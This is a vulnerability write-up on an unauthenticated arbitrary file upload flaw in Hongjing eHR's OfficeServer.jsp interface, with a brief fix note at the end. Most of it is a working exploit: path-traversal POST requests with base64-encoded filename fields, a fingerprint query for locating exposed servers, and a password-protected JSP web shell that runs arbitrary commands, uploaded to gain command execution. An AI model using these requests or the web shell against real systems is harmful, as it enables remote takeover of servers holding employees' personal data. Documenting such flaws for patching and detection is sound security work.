0x01 Product Introduction
Hongjing eHR human resource management software is a software that integrates human resource management and digital applications to meet the needs of dynamic, collaborative, process-oriented, and strategic.
0x02 Vulnerability Overview
There is an arbitrary file upload vulnerability in the Hongjing eHR OfficeServer.jsp interface. Unauthenticated remote attackers can use this vulnerability to upload arbitrary files, which can eventually cause the server to crash.
0x03 Recurrence environment
Intergraph fingerprint: app.name="Hongjing HCM"
0x04 Vulnerability Reappearance
PoC
POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Connection: close
DBSTEP V3.0 351 0 666 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
FILETYPE=Li5cNjYuanNw
RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%out.println("bbbbbbbbbbbbbbb");%>
PS: The FILETYPE field in the request body is the uploaded file name encrypted by base64
try to upload
verify
exploit
Write a jsp script with command echo
<% if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
upload
POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Connection: close
DBSTEP V3.0 351 0 666 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
FILETYPE=Li5cODguanNw
RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<% if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>"); } %>
command execution
0x05 Repair suggestion
Close the Internet exposed surface or set the interface access permission
Upgrade to a safe version